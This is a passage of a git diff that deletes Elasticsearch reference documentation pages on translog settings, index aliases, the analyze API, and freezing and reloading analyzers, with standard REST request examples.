discarded. --- - -`index.translog.flush_threshold_size`:: - - The translog stores all operations that are not yet safely persisted in Lucene - (i.e., are not part of a Lucene commit point). Although these operations are - available for reads, they will need to be replayed if the shard was stopped - and had to be recovered. This setting controls the maximum total size of these - operations, to prevent recoveries from taking too long. Once the maximum size - has been reached a flush will happen, generating a new Lucene commit point. - Defaults to `512mb`. - -[discrete] -[[index-modules-translog-retention]] -==== Translog retention - -deprecated::[7.4.0, "Translog retention settings are deprecated in favor of <>. These settings are effectively ignored since 7.4 and will be removed in a future version."] - -If an index is not using <> to -retain historical operations then {es} recovers each replica shard by replaying -operations from the primary's translog. This means it is important for the -primary to preserve extra operations in its translog in case it needs to -rebuild a replica. Moreover it is important for each replica to preserve extra -operations in its translog in case it is promoted to primary and then needs to -rebuild its own replicas in turn. The following settings control how much -translog is retained for peer recoveries. - -`index.translog.retention.size`:: - - This controls the total size of translog files to keep for each shard. - Keeping more translog files increases the chance of performing an operation - based sync when recovering a replica. If the translog files are not - sufficient, replica recovery will fall back to a file based sync. Defaults to - `512mb`. This setting is ignored, and should not be set, if soft deletes are - enabled. Soft deletes are enabled by default in indices created in {es} - versions 7.0.0 and later. - -`index.translog.retention.age`:: - - This controls the maximum duration for which translog files are kept by each - shard. Keeping more translog files increases the chance of performing an - operation based sync when recovering replicas. If the translog files are not - sufficient, replica recovery will fall back to a file based sync. Defaults to - `12h`. This setting is ignored, and should not be set, if soft deletes are - enabled. Soft deletes are enabled by default in indices created in {es} - versions 7.0.0 and later. diff --git a/docs/reference/index.asciidoc b/docs/reference/index.asciidoc deleted file mode 100644 index 1e39636c319..00000000000 --- a/docs/reference/index.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[elasticsearch-reference]] -= Elasticsearch Reference - -:include-xpack: true -:es-test-dir: {elasticsearch-root}/docs/src/test -:plugins-examples-dir: {elasticsearch-root}/plugins/examples -:xes-repo-dir: {elasticsearch-root}/x-pack/docs/{lang} -:es-repo-dir: {elasticsearch-root}/docs/reference - -include::../Versions.asciidoc[] -include::links.asciidoc[] - -include::intro.asciidoc[] - -include::release-notes/highlights.asciidoc[] - -include::getting-started.asciidoc[] - -include::setup.asciidoc[] - -include::upgrade.asciidoc[] - -include::index-modules.asciidoc[] - -include::mapping.asciidoc[] - -include::analysis.asciidoc[] - -include::indices/index-templates.asciidoc[] - -include::data-streams/data-streams.asciidoc[] - -include::ingest.asciidoc[] - -include::search/search-your-data/search-your-data.asciidoc[] - -include::query-dsl.asciidoc[] - -include::aggregations.asciidoc[] - -include::eql/eql.asciidoc[] - -include::sql/index.asciidoc[] - -include::scripting.asciidoc[] - -include::data-management.asciidoc[] - -include::ilm/index.asciidoc[] - -ifdef::permanently-unreleased-branch[] - -include::autoscaling/index.asciidoc[] - -endif::[] - -include::monitoring/index.asciidoc[] - -include::frozen-indices.asciidoc[] - -include::data-rollup-transform.asciidoc[] - -include::high-availability.asciidoc[] - -include::snapshot-restore/index.asciidoc[] - -include::{xes-repo-dir}/security/index.asciidoc[] - -include::{xes-repo-dir}/watcher/index.asciidoc[] - -include::commands/index.asciidoc[] - -include::how-to.asciidoc[] - -include::glossary.asciidoc[] - -include::rest-api/index.asciidoc[] - -include::migration/index.asciidoc[] - -include::release-notes.asciidoc[] - -include::redirects.asciidoc[] diff --git a/docs/reference/index.x.asciidoc b/docs/reference/index.x.asciidoc deleted file mode 100644 index 35204eef5b6..00000000000 --- a/docs/reference/index.x.asciidoc +++ /dev/null @@ -1 +0,0 @@ -include::index.asciidoc[] diff --git a/docs/reference/indices.asciidoc b/docs/reference/indices.asciidoc deleted file mode 100644 index 46352a7a7d0..00000000000 --- a/docs/reference/indices.asciidoc +++ /dev/null @@ -1,192 +0,0 @@ -[[indices]] -== Index APIs - -Index APIs are used to manage individual indices, -index settings, aliases, mappings, and index templates. - -[discrete] -[[index-management]] -=== Index management: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -[discrete] -[[mapping-management]] -=== Mapping management: - -* <> -* <> -* <> -* <> - -[discrete] -[[alias-management]] -=== Alias management: -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[index-settings]] -=== Index settings: -* <> -* <> -* <> - -[discrete] -[[index-templates-apis]] -=== Index templates: - -Index templates automatically apply settings, mappings, and aliases to new indices. -They are most often used to configure rolling indices for time series data to -ensure that each new index has the same configuration as the previous one. -The index template associated with a data stream configures its backing indices. -For more information, see <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[monitoring]] -=== Monitoring: -* <> -* <> -* <> -* <> - -[discrete] -[[status-management]] -=== Status management: -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[dangling-indices-api]] -=== Dangling indices: -* <> -* <> -* <> - - - -include::indices/add-alias.asciidoc[] - -include::indices/analyze.asciidoc[] - -include::indices/clearcache.asciidoc[] - -include::indices/clone-index.asciidoc[] - -include::indices/close.asciidoc[] - -include::indices/create-index.asciidoc[] - -include::indices/delete-index.asciidoc[] - -include::indices/delete-alias.asciidoc[] - -include::indices/delete-component-template.asciidoc[] - -include::indices/delete-index-template.asciidoc[] - -include::indices/delete-index-template-v1.asciidoc[] - -include::indices/flush.asciidoc[] - -include::indices/forcemerge.asciidoc[] - -include::indices/apis/freeze.asciidoc[] - -include::indices/get-component-template.asciidoc[] - -include::indices/get-field-mapping.asciidoc[] - -include::indices/get-index.asciidoc[] - -include::indices/get-alias.asciidoc[] - -include::indices/get-settings.asciidoc[] - -include::indices/get-index-template.asciidoc[] - -include::indices/get-index-template-v1.asciidoc[] - -include::indices/get-mapping.asciidoc[] - -include::indices/alias-exists.asciidoc[] - -include::indices/indices-exists.asciidoc[] - -include::indices/recovery.asciidoc[] - -include::indices/segments.asciidoc[] - -include::indices/shard-stores.asciidoc[] - -include::indices/stats.asciidoc[] - -include::indices/index-template-exists-v1.asciidoc[] - -include::indices/open-close.asciidoc[] - -include::indices/put-index-template.asciidoc[] - -include::indices/put-index-template-v1.asciidoc[] - -include::indices/put-component-template.asciidoc[] - -include::indices/put-mapping.asciidoc[] - -include::indices/refresh.asciidoc[] - -include::indices/rollover-index.asciidoc[] - -include::indices/shrink-index.asciidoc[] - -include::indices/simulate-index.asciidoc[] - -include::indices/simulate-template.asciidoc[] - -include::indices/split-index.asciidoc[] - -include::indices/synced-flush.asciidoc[] - -include::indices/types-exists.asciidoc[] - -include::indices/apis/unfreeze.asciidoc[] - -include::indices/aliases.asciidoc[] - -include::indices/update-settings.asciidoc[] - -include::indices/resolve.asciidoc[] - -include::indices/dangling-indices-list.asciidoc[] - -include::indices/dangling-index-import.asciidoc[] - -include::indices/dangling-index-delete.asciidoc[] diff --git a/docs/reference/indices/add-alias.asciidoc b/docs/reference/indices/add-alias.asciidoc deleted file mode 100644 index c51c35c4ac5..00000000000 --- a/docs/reference/indices/add-alias.asciidoc +++ /dev/null @@ -1,136 +0,0 @@ -[[indices-add-alias]] -=== Add index alias API -++++ -Add index alias -++++ - -Creates or updates an index alias. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -PUT /my-index-000001/_alias/alias1 ----- -// TEST[setup:my_index] - - -[[add-alias-api-request]] -==== {api-request-title} - -`PUT //_alias/` - -`POST //_alias/` - -`PUT //_aliases/` - -`POST //_aliases/` - - -[[add-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list or wildcard expression of index names -to add to the alias. -+ -To add all indices in the cluster to the alias, -use a value of `_all`. -+ -NOTE: You cannot add <> to an index alias. - -``:: -(Required, string) -Name of the index alias to create or update. - - -[[add-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[add-alias-api-request-body]] -==== {api-request-body-title} - -`filter`:: -(Required, query object) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias-filter] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-routing] - -[[add-alias-api-example]] -==== {api-examples-title} - -[[alias-adding]] -===== Add a time-based alias - -The following request creates an alias, `2030`, -for the `logs_20302801` index. - -[source,console] --------------------------------------------------- -PUT /logs_20302801/_alias/2030 --------------------------------------------------- -// TEST[s/^/PUT logs_20302801\n/] - -[[add-alias-api-user-ex]] -===== Add a user-based alias - -First, create an index, `users`, -with a mapping for the `user_id` field: - -[source,console] --------------------------------------------------- -PUT /users -{ - "mappings" : { - "properties" : { - "user_id" : {"type" : "integer"} - } - } -} --------------------------------------------------- - -Then add the index alias for a specific user, `user_12`: - -[source,console] --------------------------------------------------- -PUT /users/_alias/user_12 -{ - "routing" : "12", - "filter" : { - "term" : { - "user_id" : 12 - } - } -} --------------------------------------------------- -// TEST[continued] - -[[alias-index-creation]] -===== Add an alias during index creation - -You can use the <> -to add an index alias during index creation. - -[source,console] --------------------------------------------------- -PUT /logs_20302801 -{ - "mappings": { - "properties": { - "year": { "type": "integer" } - } - }, - "aliases": { - "current_day": {}, - "2030": { - "filter": { - "term": { "year": 2030 } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/alias-exists.asciidoc b/docs/reference/indices/alias-exists.asciidoc deleted file mode 100644 index 2596fddef6b..00000000000 --- a/docs/reference/indices/alias-exists.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[indices-alias-exists]] -=== Index alias exists API -++++ -Index alias exists -++++ - -Checks if an index alias exists. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -HEAD /_alias/alias1 ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/] - - -[[alias-exists-api-request]] -==== {api-request-title} - -`HEAD /_alias/` - -`HEAD //_alias/` - - -[[alias-exists-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - -[[alias-exists-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `all`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - - -[[alias-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified index aliases exist. - - `404`:: -Indicates one or more specified index aliases **do not** exist. - - -[[alias-exists-api-example]] -==== {api-examples-title} - -[source,console] ----- -HEAD /_alias/2030 -HEAD /_alias/20* -HEAD /logs_20302801/_alias/* ----- -// TEST[s/^/PUT logs_20302801\nPUT logs_20302801\/_alias\/2030\n/] diff --git a/docs/reference/indices/aliases.asciidoc b/docs/reference/indices/aliases.asciidoc deleted file mode 100644 index cd45c71d7bc..00000000000 --- a/docs/reference/indices/aliases.asciidoc +++ /dev/null @@ -1,486 +0,0 @@ -[[indices-aliases]] -=== Update index alias API -++++ -Update index alias -++++ - -Adds or removes index aliases. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "my-index-000001", "alias" : "alias1" } } - ] -} ----- -// TEST[setup:my_index] - - -[[indices-aliases-api-request]] -==== {api-request-title} - -`POST /_aliases` - - -[[indices-aliases-api-desc]] -==== {api-description-title} - -APIs in Elasticsearch accept an index name when working against a -specific index, and several indices when applicable. The index aliases -API allows aliasing an index with a name, with all APIs automatically -converting the alias name to the actual index name. An alias can also be -mapped to more than one index, and when specifying it, the alias will -automatically expand to the aliased indices. An alias can also be -associated with a filter that will automatically be applied when -searching, and routing values. An alias cannot have the same name as an index. - - -[[indices-aliases-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[indices-aliases-api-request-body]] -==== {api-request-body-title} - -`actions`:: -+ --- -(Required, array of actions) -Set of actions to perform. -Valid actions include: - -`add`:: -Adds an alias to an index. - -`remove`:: -Removes an alias from an index. - -`remove_index`:: -Deletes a concrete index, similar to the <>. Attempts to remove an index alias will fail. - -You can perform these actions on alias objects. -Valid parameters for alias objects include: - -`index`:: -(String) -Wildcard expression of index names -used to perform the action. -+ -If the `indices` parameter is not specified, -this parameter is required. -+ -NOTE: You cannot add <> to an index alias. - -`indices`:: -(Array) -Array of index names -used to perform the action. -+ -If the `index` parameter is not specified, -this parameter is required. -+ -NOTE: You cannot add <> to an index alias. - -`alias`:: -(String) -Comma-separated list or wildcard expression of index alias names to -add, remove, or delete. -+ -If the `aliases` parameter is not specified, -this parameter is required for the `add` or `remove` action. - -`aliases`:: -(Array of strings) -Array of index alias names to -add, remove, or delete. -+ -If the `alias` parameter is not specified, -this parameter is required for the `add` or `remove` action. - -`filter`:: -(Optional, query object) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias-filter] -+ -See <> for an example. - -`is_hidden`:: -(Optional, Boolean) -If `true`, the alias will be excluded from wildcard expressions by default, -unless overriden in the request using the `expand_wildcards` parameter, -similar to <>. This property must be set to the -same value on all indices that share an alias. Defaults to `false`. - -`must_exist`:: -(Optional, Boolean) -If `true`, the alias to remove must exist. Defaults to `false`. - -`is_write_index`:: -(Optional, Boolean) -If `true`, assigns the index as an alias's write index. -Defaults to `false`. -+ -An alias can have one write index at a time. -+ -See <> for an example. -+ -[IMPORTANT] -==== -Aliases that do not explicitly set `is_write_index: true` for an index, and -only reference one index, will have that referenced index behave as if it is the write index -until an additional index is referenced. At that point, there will be no write index and -writes will be rejected. -==== - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-routing] -+ -See <> for an example. - -`index_routing`:: -(Optional, string) -Custom <> used -for the alias's indexing operations. -+ -See <> for an example. - -`search_routing`:: -(Optional, string) -Custom <> used -for the alias's search operations. -+ -See <> for an example. --- - - -[[indices-aliases-api-example]] -==== {api-examples-title} - -[[indices-aliases-api-add-alias-ex]] -===== Add an alias - -The following request adds the `alias1` alias to the `test1` index. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "test1", "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -[[indices-aliases-api-remove-alias-ex]] -===== Remove an alias - -The following request removes the `alias1` alias. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "remove" : { "index" : "test1", "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[continued] - -[[indices-aliases-api-rename-alias-ex]] -===== Rename an alias - -Renaming an alias is a simple `remove` then `add` operation within the -same API. This operation is atomic, no need to worry about a short -period of time where the alias does not point to an index: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "remove" : { "index" : "test1", "alias" : "alias1" } }, - { "add" : { "index" : "test1", "alias" : "alias2" } } - ] -} --------------------------------------------------- -// TEST[continued] - -[[indices-aliases-api-add-multi-alias-ex]] -===== Add an alias to multiple indices - -Associating an alias with more than one index is simply several `add` -actions: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "test1", "alias" : "alias1" } }, - { "add" : { "index" : "test2", "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -Multiple indices can be specified for an action with the `indices` array syntax: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "indices" : ["test1", "test2"], "alias" : "alias1" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -To specify multiple aliases in one action, the corresponding `aliases` array -syntax exists as well. - -For the example above, a glob pattern can also be used to associate an alias to -more than one index that share a common name: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "test*", "alias" : "all_test_indices" } } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - -In this case, the alias is a point-in-time alias that will group all -current indices that match, it will not automatically update as new -indices that match this pattern are added/removed. - -It is an error to index to an alias which points to more than one index. - -It is also possible to swap an index with an alias in one, atomic operation. -This means there will be no point in time where the alias points to no -index in the cluster state. However, as indexing and searches involve multiple -steps, it is possible for the in-flight or queued requests to fail -due to a temporarily non-existent index. - -[source,console] --------------------------------------------------- -PUT test <1> -PUT test_2 <2> -POST /_aliases -{ - "actions" : [ - { "add": { "index": "test_2", "alias": "test" } }, - { "remove_index": { "index": "test" } } <3> - ] -} --------------------------------------------------- - -<1> An index we've added by mistake -<2> The index we should have added -<3> `remove_index` is just like <> and will only remove a concrete index. - -[[filtered]] -===== Filtered aliases - -Aliases with filters provide an easy way to create different "views" of -the same index. The filter can be defined using Query DSL and is applied -to all Search, Count, Delete By Query and More Like This operations with -this alias. - -To create a filtered alias, first we need to ensure that the fields already -exist in the mapping: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "user": { - "properties": { - "id": { - "type": "keyword" - } - } - } - } - } -} --------------------------------------------------- - -Now we can create an alias that uses a filter on field `user.id`: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "my-index-000001", - "alias": "alias2", - "filter": { "term": { "user.id": "kimchy" } } - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -[[aliases-routing]] -===== Routing - -It is possible to associate routing values with aliases. This feature -can be used together with filtering aliases in order to avoid -unnecessary shard operations. - -The following command creates a new alias `alias1` that points to index -`test`. After `alias1` is created, all operations with this alias are -automatically modified to use value `1` for routing: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias1", - "routing": "1" - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\n/] - -It's also possible to specify different routing values for searching -and indexing operations: - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias2", - "search_routing": "1,2", - "index_routing": "2" - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\n/] - -As shown in the example above, search routing may contain several values -separated by comma. Index routing can contain only a single value. - -If a search operation that uses routing alias also has a routing parameter, an -intersection of both search alias routing and routing specified in the -parameter is used. For example the following command will use "2" as a -routing value: - -[source,console] --------------------------------------------------- -GET /alias2/_search?q=user.id:kimchy&routing=2,3 --------------------------------------------------- -// TEST[continued] - -[[aliases-write-index]] -===== Write index - -It is possible to associate the index pointed to by an alias as the write index. -When specified, all index and update requests against an alias that point to multiple -indices will attempt to resolve to the one index that is the write index. -Only one index per alias can be assigned to be the write index at a time. If no write index is specified -and there are multiple indices referenced by an alias, then writes will not be allowed. - -It is possible to specify an index associated with an alias as a write index using both the aliases API -and index creation API. - -Setting an index to be the write index with an alias also affects how the alias is manipulated during -Rollover (see <>). - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias1", - "is_write_index": true - } - }, - { - "add": { - "index": "test2", - "alias": "alias1" - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\nPUT test2\n/] - -In this example, we associate the alias `alias1` to both `test` and `test2`, where -`test` will be the index chosen for writing to. - -[source,console] --------------------------------------------------- -PUT /alias1/_doc/1 -{ - "foo": "bar" -} --------------------------------------------------- -// TEST[continued] - -The new document that was indexed to `/alias1/_doc/1` will be indexed as if it were -`/test/_doc/1`. - -[source,console] --------------------------------------------------- -GET /test/_doc/1 --------------------------------------------------- -// TEST[continued] - -To swap which index is the write index for an alias, the Aliases API can be leveraged to -do an atomic swap. The swap is not dependent on the ordering of the actions. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions": [ - { - "add": { - "index": "test", - "alias": "alias1", - "is_write_index": false - } - }, { - "add": { - "index": "test2", - "alias": "alias1", - "is_write_index": true - } - } - ] -} --------------------------------------------------- -// TEST[s/^/PUT test\nPUT test2\n/] diff --git a/docs/reference/indices/analyze.asciidoc b/docs/reference/indices/analyze.asciidoc deleted file mode 100644 index d115702c1fa..00000000000 --- a/docs/reference/indices/analyze.asciidoc +++ /dev/null @@ -1,373 +0,0 @@ -[[indices-analyze]] -=== Analyze API -++++ -Analyze -++++ - -Performs <> on a text string -and returns the resulting tokens. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "analyzer" : "standard", - "text" : "Quick Brown Foxes!" -} --------------------------------------------------- - - -[[analyze-api-request]] -==== {api-request-title} - -`GET /_analyze` - -`POST /_analyze` - -`GET //_analyze` - -`POST //_analyze` - - -[[analyze-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Optional, string) -Index used to derive the analyzer. - -If specified, -the `analyzer` or `` parameter overrides this value. - -If no analyzer or field are specified, -the analyze API uses the default analyzer for the index. - -If no index is specified -or the index does not have a default analyzer, -the analyze API uses the <>. --- - - -[[analyze-api-query-params]] -==== {api-query-parms-title} - -`analyzer`:: -+ --- -(Optional, string) -The name of the analyzer that should be applied to the provided `text`. This could be a -<>, or an analyzer that's been configured in the index. - -If this parameter is not specified, -the analyze API uses the analyzer defined in the field's mapping. - -If no field is specified, -the analyze API uses the default analyzer for the index. - -If no index is specified, -or the index does not have a default analyzer, -the analyze API uses the <>. --- - -`attributes`:: -(Optional, array of strings) -Array of token attributes used to filter the output of the `explain` parameter. - -`char_filter`:: -(Optional, array of strings) -Array of character filters used to preprocess characters before the tokenizer. -See <> for a list of character filters. - -`explain`:: -(Optional, Boolean) -If `true`, the response includes token attributes and additional details. -Defaults to `false`. -experimental:[The format of the additional detail information is labelled as experimental in Lucene and it may change in the future.] - -`field`:: -+ --- -(Optional, string) -Field used to derive the analyzer. -To use this parameter, -you must specify an index. - -If specified, -the `analyzer` parameter overrides this value. - -If no field is specified, -the analyze API uses the default analyzer for the index. - -If no index is specified -or the index does not have a default analyzer, -the analyze API uses the <>. --- - -`filter`:: -(Optional, Array of strings) -Array of token filters used to apply after the tokenizer. -See <> for a list of token filters. - -`normalizer`:: -(Optional, string) -Normalizer to use to convert text into a single token. -See <> for a list of normalizers. - -`text`:: -(Required, string or array of strings) -Text to analyze. -If an array of strings is provided, it is analyzed as a multi-value field. - -`tokenizer`:: -(Optional, string) -Tokenizer to use to convert text into tokens. -See <> for a list of tokenizers. - -[[analyze-api-example]] -==== {api-examples-title} - -[[analyze-api-no-index-ex]] -===== No index specified - -You can apply any of the built-in analyzers to the text string without -specifying an index. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "analyzer" : "standard", - "text" : "this is a test" -} --------------------------------------------------- - -[[analyze-api-text-array-ex]] -===== Array of text strings - -If the `text` parameter is provided as array of strings, it is analyzed as a multi-value field. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "analyzer" : "standard", - "text" : ["this is a test", "the second text"] -} --------------------------------------------------- - -[[analyze-api-custom-analyzer-ex]] -===== Custom analyzer - -You can use the analyze API to test a custom transient analyzer built from -tokenizers, token filters, and char filters. Token filters use the `filter` -parameter: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "keyword", - "filter" : ["lowercase"], - "text" : "this is a test" -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "keyword", - "filter" : ["lowercase"], - "char_filter" : ["html_strip"], - "text" : "this is a test" -} --------------------------------------------------- - -Custom tokenizers, token filters, and character filters can be specified in the request body as follows: - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "whitespace", - "filter" : ["lowercase", {"type": "stop", "stopwords": ["a", "is", "this"]}], - "text" : "this is a test" -} --------------------------------------------------- - -[[analyze-api-specific-index-ex]] -===== Specific index - -You can also run the analyze API against a specific index: - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -The above will run an analysis on the "this is a test" text, using the -default index analyzer associated with the `analyze_sample` index. An `analyzer` -can also be provided to use a different analyzer: - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "analyzer" : "whitespace", - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -[[analyze-api-field-ex]] -===== Derive analyzer from a field mapping - -The analyzer can be derived based on a field mapping, for example: - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "field" : "obj1.field1", - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -Will cause the analysis to happen based on the analyzer configured in the -mapping for `obj1.field1` (and if not, the default index analyzer). - -[[analyze-api-normalizer-ex]] -===== Normalizer - -A `normalizer` can be provided for keyword field with normalizer associated with the `analyze_sample` index. - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "normalizer" : "my_normalizer", - "text" : "BaR" -} --------------------------------------------------- -// TEST[setup:analyze_sample] - -Or by building a custom transient normalizer out of token filters and char filters. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "filter" : ["lowercase"], - "text" : "BaR" -} --------------------------------------------------- - -[[explain-analyze-api]] -===== Explain analyze - -If you want to get more advanced details, set `explain` to `true` (defaults to `false`). It will output all token attributes for each token. -You can filter token attributes you want to output by setting `attributes` option. - -NOTE: The format of the additional detail information is labelled as experimental in Lucene and it may change in the future. - -[source,console] --------------------------------------------------- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["snowball"], - "text" : "detailed output", - "explain" : true, - "attributes" : ["keyword"] <1> -} --------------------------------------------------- - -<1> Set "keyword" to output "keyword" attribute only - -The request returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "detail" : { - "custom_analyzer" : true, - "charfilters" : [ ], - "tokenizer" : { - "name" : "standard", - "tokens" : [ { - "token" : "detailed", - "start_offset" : 0, - "end_offset" : 8, - "type" : "", - "position" : 0 - }, { - "token" : "output", - "start_offset" : 9, - "end_offset" : 15, - "type" : "", - "position" : 1 - } ] - }, - "tokenfilters" : [ { - "name" : "snowball", - "tokens" : [ { - "token" : "detail", - "start_offset" : 0, - "end_offset" : 8, - "type" : "", - "position" : 0, - "keyword" : false <1> - }, { - "token" : "output", - "start_offset" : 9, - "end_offset" : 15, - "type" : "", - "position" : 1, - "keyword" : false <1> - } ] - } ] - } -} --------------------------------------------------- - -<1> Output only "keyword" attribute, since specify "attributes" in the request. - -[[tokens-limit-settings]] -===== Setting a token limit -Generating excessive amount of tokens may cause a node to run out of memory. -The following setting allows to limit the number of tokens that can be produced: - -`index.analyze.max_token_count`:: - The maximum number of tokens that can be produced using `_analyze` API. - The default value is `10000`. If more than this limit of tokens gets - generated, an error will be thrown. The `_analyze` endpoint without a specified - index will always use `10000` value as a limit. This setting allows you to control - the limit for a specific index: - - -[source,console] --------------------------------------------------- -PUT /analyze_sample -{ - "settings" : { - "index.analyze.max_token_count" : 20000 - } -} --------------------------------------------------- - - -[source,console] --------------------------------------------------- -GET /analyze_sample/_analyze -{ - "text" : "this is a test" -} --------------------------------------------------- -// TEST[setup:analyze_sample] diff --git a/docs/reference/indices/apis/freeze.asciidoc b/docs/reference/indices/apis/freeze.asciidoc deleted file mode 100644 index da2cffa540c..00000000000 --- a/docs/reference/indices/apis/freeze.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[freeze-index-api]] -=== Freeze index API -++++ -Freeze index -++++ - -Freezes an index. - -[[freeze-index-api-request]] -==== {api-request-title} - -`POST //_freeze` - -//[[freeze-index-api-prereqs]] -//==== {api-prereq-title} - -[[freeze-index-api-desc]] -==== {api-description-title} - -A frozen index has almost no overhead on the cluster (except for maintaining its -metadata in memory) and is read-only. Read-only indices are blocked for write -operations, such as <> or <>. See <> and <>. - -The current write index on a data stream cannot be frozen. In order to freeze -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be frozen. - -IMPORTANT: Freezing an index will close the index and reopen it within the same -API call. This causes primaries to not be allocated for a short amount of time -and causes the cluster to go red until the primaries are allocated again. This -limitation might be removed in the future. - -[[freeze-index-api-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the index. - -[[freeze-index-api-examples]] -==== {api-examples-title} - -The following example freezes and unfreezes an index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_freeze -POST /my-index-000001/_unfreeze --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - diff --git a/docs/reference/indices/apis/reload-analyzers.asciidoc b/docs/reference/indices/apis/reload-analyzers.asciidoc deleted file mode 100644 index 301cd2daeac..00000000000 --- a/docs/reference/indices/apis/reload-analyzers.asciidoc +++ /dev/null @@ -1,174 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[indices-reload-analyzers]] -== Reload search analyzers API - -Reloads an index's <> and their resources. -For data streams, the API reloads search analyzers and resources for the -stream's backing indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_reload_search_analyzers --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[indices-reload-analyzers-api-request]] -=== {api-request-title} - -`POST //_reload_search_analyzers` - -`GET //_reload_search_analyzers` - - -[discrete] -[[indices-reload-analyzers-api-desc]] -=== {api-description-title} - -You can use the reload search analyzers API -to pick up changes to synonym files -used in the <> -or <> token filter -of a <>. -To be eligible, -the token filter must have an `updateable` flag of `true` -and only be used in search analyzers. - -[NOTE] -==== -This API does not perform a reload -for each shard of an index. -Instead, -it performs a reload for each node -containing index shards. -As a result, -the total shard count returned by the API -can differ from the number of index shards. - -Because reloading affects every node with an index shard, -its important to update the synonym file -on every data node in the cluster, -including nodes that don't contain a shard replica, -before using this API. -This ensures the synonym file is updated -everywhere in the cluster -in case shards are relocated -in the future. -==== - - -[discrete] -[[indices-reload-analyzers-api-path-params]] -=== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated 